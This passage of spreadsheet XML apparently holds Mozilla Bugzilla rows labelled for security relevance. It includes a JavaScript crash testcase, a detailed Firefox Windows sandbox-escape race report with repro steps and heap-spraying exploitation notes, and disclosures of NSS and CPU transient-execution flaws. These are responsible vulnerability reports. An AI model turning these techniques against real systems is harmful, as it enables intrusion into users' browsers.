          <t>Trunk</t>
        </is>
      </c>
      <c r="L31" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M31" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N31" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O31" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P31" t="inlineStr">
        <is>
          <t>[advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q31" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R31" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S31" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T31" t="n">
        <v>1</v>
      </c>
      <c r="U31" t="n">
        <v>0</v>
      </c>
      <c r="V31" t="n">
        <v>14</v>
      </c>
      <c r="W31" t="inlineStr">
        <is>
          <t>Created attachment 649406
stacks
r = evalcx("/x/", undefined);
s = "";
gc()
Function("\
    s.match(r);\
    schedulegc(__proto__);\
    ({c:schedulegc(2)});\
    s.match(r);\
")()
crashes js debug shell on m-c changeset 6c60e99d9739 without any CLI arguments at JSC::Yarr::execute with js::RegExpShared::execute on the stack.</t>
        </is>
      </c>
      <c r="X31" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" t="n">
        <v>1599005</v>
      </c>
      <c r="B32" t="inlineStr">
        <is>
          <t>2019-11-24 23:16:27 -0800</t>
        </is>
      </c>
      <c r="C32" t="inlineStr">
        <is>
          <t>Race condition in firefox!sandbox::SharedMemIPCServer::Init leading to relative out-of-bounds read/write in the broker process (Sandbox escape / LPE)</t>
        </is>
      </c>
      <c r="D32" t="inlineStr">
        <is>
          <t>2024-05-30 10:04:55 -0700</t>
        </is>
      </c>
      <c r="E32" t="n">
        <v>1</v>
      </c>
      <c r="F32" t="n">
        <v>1</v>
      </c>
      <c r="G32" t="n">
        <v>3</v>
      </c>
      <c r="H32" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I32" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J32" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K32" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L32" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M32" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N32" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O32" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P32" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main72+][adv-esr68.4+]</t>
        </is>
      </c>
      <c r="Q32" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R32" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S32" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T32" t="n">
        <v>1</v>
      </c>
      <c r="U32" t="n">
        <v>0</v>
      </c>
      <c r="V32" t="n">
        <v>43</v>
      </c>
      <c r="W32" t="inlineStr">
        <is>
          <t>Created attachment 9111144
race.zip
Hi,
These issues only affects Windows client, I found two race condition in the shared memory of Firefox sandbox implementation.
* Information Disclosure of broker heap address in CopyPolicyToTarget (race described in the next issue)
* Memory corruption (Sandbox escape) in sandbox::SharedMemIPCServer::ThreadPingEventReady (described in this issue)
Vulnerability:
Since Firefox (current version tested 70.0.1) configures the renderer sandbox with USER_LIMITED and Initial Integrity Level == Delayed Integrity Level (INTEGRITY_LEVEL_LOW), any renderer process can interact with other renderers process (read/write/createthread/duplicatehandles) even while new renderer process bootstrapping (when a new tab process is spawned). 
Google Chrome is not affected because the renderer processes runs with a USER_LOCKDOWN token (also the initial integrity level = LOW and delayed IL is UNTRUSTED) which prevent access to other renderer processes.
The race condition vulnerability happens during new process bootstrapping, when a new tab process is created, the broker does:
1/ CreateProcess SUSPENDED with the lockdown token (USER_LIMITED for Firefox renderer) and low IL in TargetProcess::Create
2/ Assign target process to JOB object 
3/ Change target thread token to initial token (USER_RESTRICTED_SAME_ACCESS) for initialisation later
4/ Create IPCServer shared memory in TargetProcess::Init
5/ DuplicateHandle the shared memory with the target in TargetProcess::Init
6/ Initialise the shared memory in SharedMemIPCServer::Init
So, the target process is suspended but other tabs are not and they can access the target process (thanks to USER_LIMITED token and same IL) and duplicate the IPC shared memory handle.
The shared memory initialisation is vulnerable to race condition when initialising service_context-&gt;channel_buffer in SharedMemIPCServer::Init (6):
bool SharedMemIPCServer::Init(void* shared_mem,
                              uint32_t shared_size,
                              uint32_t channel_size) {
..
  client_control_ = reinterpret_cast&lt;IPCControl*&gt;(shared_mem); // client_control_ points to shared memory
..
  for (size_t ix = 0; ix != channel_count; ++ix) {
    ChannelControl* client_context = &amp;client_control_-&gt;channels[ix]; // client_context points to shared memory
..
    client_context-&gt;channel_base = base_start; // (A) Write to shared memory (channel_base)
    client_context-&gt;state = kFreeChannel;
..
    service_context-&gt;shared_base = reinterpret_cast&lt;char*&gt;(shared_mem);
    service_context-&gt;channel_size = channel_size;
    service_context-&gt;channel = client_context;
    service_context-&gt;channel_buffer =
        service_context-&gt;shared_base + client_context-&gt;channel_base; // (B) Race condition between (A) and (B), read from shared memory (the value client_context-&gt;channel_base can be different)
Source code in:
https://github.com/mozilla/gecko-dev/blob/master/security/sandbox/chromium/sandbox/win/src/sharedmem_ipc_server.cc#L122
This vulnerability can lead to relative out-of-bounds read and write in the broker process in sandbox::SharedMemIPCServer::ThreadPingEventReady when the ping event is signaled. 
The pointer service_context-&gt;channel_buffer is fully controlled (64 bits added offset) due to the race condition.
Crash:
firefox!sandbox::CrossCallParams::GetParamsCount:
00007ff7`c6ae4d60 8b4160          mov     eax,dword ptr [rcx+60h] ds:424243c6`124242a2=????????
0:018&gt; kc
 # Call Site
00 firefox!sandbox::CrossCallParams::GetParamsCount
01 firefox!sandbox::CrossCallParamsEx::CreateFromBuffer
02 firefox!sandbox::SharedMemIPCServer::InvokeCallback
03 firefox!sandbox::SharedMemIPCServer::ThreadPingEventReady
This exception is a first chance and handled by SEH, the second chance exception is:
firefox!sandbox::SharedMemIPCServer::ThreadPingEventReady+0x8d: 
00007ff7`c6aff1bd 48894758        mov     qword ptr [rdi+58h],rax ds:424243c6`1242429a=????????????????
during memcpy(call_params-&gt;GetCallReturn(), &amp;call_result, sizeof(call_result));
Repro:
I didn't work a lot to make the race reliable so the provided POC (attachment payload_corrupt) rarely triggers the vulnerability.
To reproduce, please debug and break in the broker process between (A) and (B) to help the race on the first subchannel channel_base.
Install Python 2.7 64 bits and PythonForWindows (https://github.com/hakril/PythonForWindows) then run inject.py with the payload_corrupt.dll path.
Exploitability:
The exploitation assumes having code execution in sandboxed renderers processes (RCE -&gt; LPE step targeted).
Since the race condition allow to corrupt the offset of the IPC channel buffer, you can overwrite data near the shared memory base in the broker without requiring an information disclosure vulnerability.
Notice that the shared_base is close to the service_context address which is stored in the broker heap.
dt firefox!sandbox::SharedMemIPCServer::ServerControl 0x00000183d630eec0
   +0x018 channel_buffer   : 0x424243c6`12424242  "--- memory read error at address 0x424243c6`12424242 ---"
   +0x020 shared_base      : 0x00000183`d0000000  "???"
   +0x028 channel          : 0x00000183`d0000010 sandbox::ChannelControl
   +0x030 dispatcher       : 0x00000183`d7f36a00 sandbox::Dispatcher
So, by spraying heap using an exploit convenient object (not researched), you can use this vulnerability to corrupt other heap allocation (craft fake IPC crosscall in the heap and corrupt adjacent allocations) and with some work, achieve code execution in Firefox main process (Sandbox escape).
Thank you</t>
        </is>
      </c>
      <c r="X32" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" t="n">
        <v>1186621</v>
      </c>
      <c r="B33" t="inlineStr">
        <is>
          <t>2015-07-22 13:42:34 -0700</t>
        </is>
      </c>
      <c r="C33" t="inlineStr">
        <is>
          <t>Memory-safety bug in Buffer11::NativeBuffer11::map</t>
        </is>
      </c>
      <c r="D33" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:24 -0700</t>
        </is>
      </c>
      <c r="E33" t="n">
        <v>1</v>
      </c>
      <c r="F33" t="n">
        <v>1</v>
      </c>
      <c r="G33" t="n">
        <v>3</v>
      </c>
      <c r="H33" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I33" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J33" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K33" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L33" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M33" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N33" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O33" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P33" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5?][post-critsmash-triage][adv-main44+] fixed by ANGLE update bug 1179280</t>
        </is>
      </c>
      <c r="Q33" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R33" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S33" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T33" t="n">
        <v>1</v>
      </c>
      <c r="U33" t="n">
        <v>0</v>
      </c>
      <c r="V33" t="n">
        <v>23</v>
      </c>
      <c r="W33" t="inlineStr">
        <is>
          <t>Buffer11::NativeBuffer11::map (gfx\angle\src\libGLESv2\renderer\d3d\d3d11\Buffer11.cpp) can cause its callers to use a wild pointer to read and/or write data to memory. This is because it calls ID3D11DeviceContext::Map without checking the return code (in release builds). It then returns the resulting mappedResource.pData to its callers, which use it to read and/or write data into memory that (on success) would be mapped to a GPU buffer. But mappedResource is an automatic variable with no explicit initialization, and it isa D3D11_MAPPED_SUBRESOURCE, which lacks a constructor and so does not initialize itself. Thus, on failure (which is possible: see https://msdn.microsoft.com/en-us/library/windows/desktop/ff476457%28v=vs.85%29.aspx ) callers use a wild pointer to read and/or write data to memory.
788: void *Buffer11::NativeBuffer11::map(size_t offset, size_t length, GLbitfield access)
789: {
790:     ASSERT(mUsage == BUFFER_USAGE_STAGING);
791: 
792:     D3D11_MAPPED_SUBRESOURCE mappedResource;
793:     ID3D11DeviceContext *context = mRenderer-&gt;getDeviceContext();
794:     D3D11_MAP d3dMapType = gl_d3d11::GetD3DMapTypeFromBits(access);
795:     UINT d3dMapFlag = ((access &amp; GL_MAP_UNSYNCHRONIZED_BIT) != 0 ? D3D11_MAP_FLAG_DO_NOT_WAIT : 0);
796: 
797:     HRESULT result = context-&gt;Map(mNativeBuffer, 0, d3dMapType, d3dMapFlag, &amp;mappedResource);
798:     UNUSED_ASSERTION_VARIABLE(result);
799:     ASSERT(SUCCEEDED(result));
800: 
801:     return static_cast&lt;GLubyte*&gt;(mappedResource.pData) + offset;
802: }
There are reports of ID3D11DeviceContext::Map returning error in other applications in OOM situations (e.g, https://community.amd.com/thread/128535 ) , and when there are underlying graphics driver bugs (e.g., http://answers.flyppdevportal.com/categories/metro/gameswithdirectx.aspx?ID=7ff91f34-f8e0-4197-a5d7-991e136ae939 ).
*** There is also a similar bug in Buffer11::NativeBuffer11::copyFromStorage in the same module, but other code in the same module, e.g.,  Buffer11::getData, handles this issue correctly. ***</t>
        </is>
      </c>
      <c r="X33" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" t="n">
        <v>1356555</v>
      </c>
      <c r="B34" t="inlineStr">
        <is>
          <t>2017-04-14 05:34:44 -0700</t>
        </is>
      </c>
      <c r="C34" t="inlineStr">
        <is>
          <t>[UX] about:license content and design update</t>
        </is>
      </c>
      <c r="D34" t="inlineStr">
        <is>
          <t>2017-05-03 05:02:20 -0700</t>
        </is>
      </c>
      <c r="E34" t="n">
        <v>1</v>
      </c>
      <c r="F34" t="n">
        <v>1</v>
      </c>
      <c r="G34" t="n">
        <v>2</v>
      </c>
      <c r="H34" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I34" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J34" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K34" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L34" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M34" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N34" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O34" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P34" t="inlineStr">
        <is>
          <t>[photon-visual][ux]</t>
        </is>
      </c>
      <c r="Q34" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R34" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S34" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T34" t="n">
        <v>1</v>
      </c>
      <c r="U34" t="n">
        <v>0</v>
      </c>
      <c r="V34" t="n">
        <v>6</v>
      </c>
      <c r="W34" t="inlineStr">
        <is>
          <t>Update layout and page illustration to align with Photon design.</t>
        </is>
      </c>
      <c r="X34" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" t="n">
        <v>434844</v>
      </c>
      <c r="B35" t="inlineStr">
        <is>
          <t>2008-05-20 13:59:44 -0700</t>
        </is>
      </c>
      <c r="C35" t="inlineStr">
        <is>
          <t>No Mozilla2 tinderboxes are running the codesize test</t>
        </is>
      </c>
      <c r="D35" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E35" t="n">
        <v>1</v>
      </c>
      <c r="F35" t="n">
        <v>1</v>
      </c>
      <c r="G35" t="n">
        <v>5</v>
      </c>
      <c r="H35" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I35" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J35" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K35" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L35" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M35" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N35" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O35" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P35" t="inlineStr"/>
      <c r="Q35" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R35" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S35" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T35" t="n">
        <v>1</v>
      </c>
      <c r="U35" t="n">
        <v>0</v>
      </c>
      <c r="V35" t="n">
        <v>28</v>
      </c>
      <c r="W35" t="inlineStr">
        <is>
          <t>After the discussion in bug 434085 I noticed that no tinderboxes on http://tinderbox.mozilla.org/showbuilds.cgi?tree=Mozilla2 are running the Codesize (Z:) test.  This is run on the build machines on the Firefox tinderbox:
Linux fx-linux-tbox Dep Nightly
MacOSX Darwin 8.8.4 bm-xserve08 Dep Universal Nightly
(I'm not sure if we ever had it running on Windows.)</t>
        </is>
      </c>
      <c r="X35" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" t="n">
        <v>1602344</v>
      </c>
      <c r="B36" t="inlineStr">
        <is>
          <t>2019-12-08 21:28:29 -0800</t>
        </is>
      </c>
      <c r="C36" t="inlineStr">
        <is>
          <t>[siglist] Add __forwarding_prep_0___ to skip list</t>
        </is>
      </c>
      <c r="D36" t="inlineStr">
        <is>
          <t>2019-12-10 08:12:43 -0800</t>
        </is>
      </c>
      <c r="E36" t="n">
        <v>1</v>
      </c>
      <c r="F36" t="n">
        <v>1</v>
      </c>
      <c r="G36" t="n">
        <v>4</v>
      </c>
      <c r="H36" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I36" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J36" t="inlineStr">
        <is>
          <t>Signature</t>
        </is>
      </c>
      <c r="K36" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L36" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M36" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N36" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O36" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P36" t="inlineStr"/>
      <c r="Q36" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R36" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S36" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T36" t="n">
        <v>1</v>
      </c>
      <c r="U36" t="n">
        <v>0</v>
      </c>
      <c r="V36" t="n">
        <v>5</v>
      </c>
      <c r="W36" t="inlineStr">
        <is>
          <t>This appears in a crash stack when an Objective-C "message" is being "forwarded" to an object that might be able to handle it. It is meaningless in itself.
I don't have any examples of this as a signature, but here are two stacks in which it appears:
bp-1a9ebfb8-1234-4966-b30a-aa0870191209
bp-d9b67a17-2e1c-4494-9825-e3be60191208</t>
        </is>
      </c>
      <c r="X36" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" t="n">
        <v>1692972</v>
      </c>
      <c r="B37" t="inlineStr">
        <is>
          <t>2021-02-16 00:05:56 -0800</t>
        </is>
      </c>
      <c r="C37" t="inlineStr">
        <is>
          <t>FPVI &amp; SCSB Disclosure (Feb 12, ‘21)</t>
        </is>
      </c>
      <c r="D37" t="inlineStr">
        <is>
          <t>2024-05-30 10:27:44 -0700</t>
        </is>
      </c>
      <c r="E37" t="n">
        <v>1</v>
      </c>
      <c r="F37" t="n">
        <v>1</v>
      </c>
      <c r="G37" t="n">
        <v>3</v>
      </c>
      <c r="H37" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I37" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J37" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K37" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L37" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M37" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N37" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O37" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P37" t="inlineStr">
        <is>
          <t>[Disclosure date ≈2021-05-12][reporter-external] [client-bounty-form] [verif?][adv-main87-][adv-esr78.9-][sec-survey]</t>
        </is>
      </c>
      <c r="Q37" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R37" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S37" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T37" t="n">
        <v>1</v>
      </c>
      <c r="U37" t="n">
        <v>0</v>
      </c>
      <c r="V37" t="n">
        <v>46</v>
      </c>
      <c r="W37" t="inlineStr">
        <is>
          <t>I am filing this on behalf of Hany Ragab, Enrico Barberis, Herbert Bos, and Cristiano Giuffrida from the VUSec group at VU Amsterdam, who sent an email to security@mozilla.org:
Hi,
This is to inform you we at VUSec just disclosed two new transient execution vulnerabilities to Intel and AMD. We term such vulnerabilities Floating Point Value Injection (or FPVI) and Speculative Code Store Bypass (or SCSB)---due to the similarities with LVI and Spectre-SSB. We don’t yet know if these have already been disclosed by others, but we wanted to give you all the information as early as possible (due to a long history of communication issues with Intel). We’re currently aiming for a 90-day embargo period.
PFA the same archive disclosed to Intel &amp; AMD, containing: (i) the paper documenting the vulnerabilities and our analysis just submitted to USENIX Security (Winter); (ii) a disclosure overview document briefly introducing FPVI &amp; SCSB, our proposed mitigations, and Proof-of-Concept exploits (PoCs); (iii) two PoCs inspired by real-world applications (browsers) to reproduce FPVI &amp; SCSB.
Note that while our exploits use SpiderMonkey as a point of reference, they’re both native PoCs that cannot directly run in a SpiderMonkey sandbox. We believe producing end-to-end exploits in JavaScript just requires additional engineering effort especially for FPVI, since we have verified the JIT engine is affected. We’re working on end-to-end exploits in ongoing work and we’ll update you as soon as we have results. Luckily, the mitigations are relatively simple. Both issues can be mitigated with Fission. Without Fission, SCSB’s mitigation is straightforward (i.e., use a serializing instruction like lfence on x86 in FlushICache), while FPVI imposes some performance/precision tradeoffs (see disclosure overview and paper for details). We’re concurrently disclosing these issues to Chromium. We’d like to know if you are able to inform other browser vendors besides Chromium.
Please let us know if you have questions/comments, we’re happy to discuss these issues in more detail. Please CC mc@vusec.net in all future communication on this issue. This is to reach the “MC team” disclosing the vulnerabilities, that is “Hany Ragab, Enrico Barberis, Herbert Bos, and Cristiano Giuffrida from the VUSec group at VU Amsterdam”.
Please let us also know if you’d also like this report filed on Bugzilla, as suggested at https://www.mozilla.org/en-US/about/governance/policies/security-group/bugs.
Best,
Cristiano (on behalf of the MC @VUSec team)
PS.: mc@vusec.net is simply an alias for hany.ragab@vu.nl, e.barberis@vu.nl,
herbertb@cs.vu.nl, giuffrida@cs.vu.nl, you can find the corresponding PGP keys here:
https://keyserver.ubuntu.com/pks/lookup?op=get&amp;search=0x409784444f2ac8f2643eb39d0515f11a30c299fa (Hany)
https://keyserver.ubuntu.com/pks/lookup?op=get&amp;search=0x4f6517e19584e1c454d4c36ee2ef4734fc503bda (Enrico)
https://keyserver.ubuntu.com/pks/lookup?op=get&amp;search=0xb9d27a126befc1ba3cdd6866f3e2f9f5fa47c706 (Herbert)
https://keyserver.ubuntu.com/pks/lookup?op=get&amp;search=0x038bd8776dd243469da4df1c7a0c07dcc87edb69 (Cristiano)</t>
        </is>
      </c>
      <c r="X37" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" t="n">
        <v>1483128</v>
      </c>
      <c r="B38" t="inlineStr">
        <is>
          <t>2018-08-14 00:03:51 -0700</t>
        </is>
      </c>
      <c r="C38" t="inlineStr">
        <is>
          <t>ServerHello.random is all zero when handling a v2-compatible ClientHello</t>
        </is>
      </c>
      <c r="D38" t="inlineStr">
        <is>
          <t>2019-05-24 05:01:30 -0700</t>
        </is>
      </c>
      <c r="E38" t="n">
        <v>1</v>
      </c>
      <c r="F38" t="n">
        <v>1</v>
      </c>
      <c r="G38" t="n">
        <v>3</v>
      </c>
      <c r="H38" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I38" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J38" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K38" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L38" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M38" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N38" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O38" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P38" t="inlineStr"/>
      <c r="Q38" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R38" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S38" t="inlineStr">
        <is>
          <t>3.39</t>
        </is>
      </c>
      <c r="T38" t="n">
        <v>1</v>
      </c>
      <c r="U38" t="n">
        <v>0</v>
      </c>
      <c r="V38" t="n">
        <v>55</v>
      </c>
      <c r="W38" t="inlineStr">
        <is>
          <t>When we added the very first support for TLS 1.3 in bug 1057463, that moved the generation of the ServerHello.random to ssl3_HandleClientHello():
https://searchfox.org/nss/diff/e89d3055c719e257017518b56dff5cf4b7f6d480/lib/ssl/ssl3con.c#8109
Unfortunately, that removed the call to ssl3_GetNewRandom() on the server side when handling an SSLv2-compatible ClientHello.  It was previously in ssl3_SendServerHello().  Now, if an SSLv2-compatible ClientHello is received, the server doesn't generate a new random: it sends an all-zero value.
This results in full malleability of the ClientHello.  The only restrictions are minor: an attacker can't negotiate TLS 1.3, an extended master secret, or to include the downgrade SCSV if it is reducing the version.
That means the server is exposed to almost arbitrary downgrade.  An attacker can cause a server to use the weakest configuration it is willing to operate.  However, this does not appear to result in a compromise of the pre-master secret, because an honest client is involved in generating either a DH share or the pre-master secret (for static RSA).
No fresh entropy from the server means that the server doesn't verify that the client is live.  Duplicate ClientHello.random values result in identical key exchange signatures, pre-master secrets, and Finished values.  The attacks in RFC 7627 are probably a subset of what is possible.
Unless I've missed something, this has no obvious mitigation other than fixing the code.  Support for a SSLv2-compatible ClientHello cannot be disabled in configuration.  And we don't have our TLS 1.3 downgrade measures in place, which would be effective here.  As long as a server accepts TLS 1.2 or lower, it's vulnerable to attack.
I have a fix, and I can try to hide that fix under other work related to the release of RFC 8446, but this is hard to hide.
We might also want to check - as a client - for an all-zero ServerHello.random.
I believe that Firefox is not affected.  Our only use of NSS as a server is in DTLS and test code.  DTLS isn't affected by this problem.
We'll need a CVE on this one.  And new releases for any NSS version in the last 3 years that we still intend to support.</t>
        </is>
      </c>
      <c r="X38" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" t="n">
        <v>752038</v>
      </c>
      <c r="B39" t="inlineStr">
        <is>
          <t>2012-05-04 14:06:25 -0700</t>
        </is>
      </c>
      <c r="C39" t="inlineStr">
        <is>
          <t>"ASSERTION: wrapper already in new scope!" with location.hash, document.open</t>
        </is>
      </c>
      <c r="D39" t="inlineStr">
        <is>
          <t>2012-10-21 22:18:33 -0700</t>
        </is>
      </c>
      <c r="E39" t="n">
        <v>1</v>
      </c>
      <c r="F39" t="n">
        <v>1</v>
      </c>
      <c r="G39" t="n">
        <v>3</v>
      </c>
      <c r="H39" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I39" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J39" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K39" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L39" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M39" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N39" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O39" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P39" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q39" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R39" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S39" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T39" t="n">
        <v>1</v>
      </c>
      <c r="U39" t="n">
        <v>0</v>
      </c>
      <c r="V39" t="n">
        <v>19</v>
      </c>
      <c r="W39" t="inlineStr">
        <is>
          <t>Created attachment 621165
testcase (inner)
To reproduce, save both testcase files, then open outer.html.
###!!! ASSERTION: wrapper already in new scope!: '!newMap-&gt;Find(wrapper-&gt;GetIdentityObject())', file js/xpconnect/src/XPCWrappedNative.cpp, line 1636
Might be a regression from cpg.</t>
        </is>
      </c>
      <c r="X39" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" t="n">
        <v>495563</v>
      </c>
      <c r="B40" t="inlineStr">
        <is>
          <t>2009-05-29 16:56:52 -0700</t>
        </is>
      </c>
      <c r="C40" t="inlineStr">
        <is>
          <t>TM: Crash with (function() { return this; })()</t>
        </is>
      </c>
      <c r="D40" t="inlineStr">
        <is>
          <t>2009-06-06 16:49:23 -0700</t>
        </is>
      </c>
      <c r="E40" t="n">
        <v>1</v>
      </c>
      <c r="F40" t="n">
        <v>1</v>
      </c>
      <c r="G40" t="n">
        <v>3</v>
      </c>
      <c r="H40" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I40" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J40" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K40" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L40" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M40" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N40" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O40" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P40" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
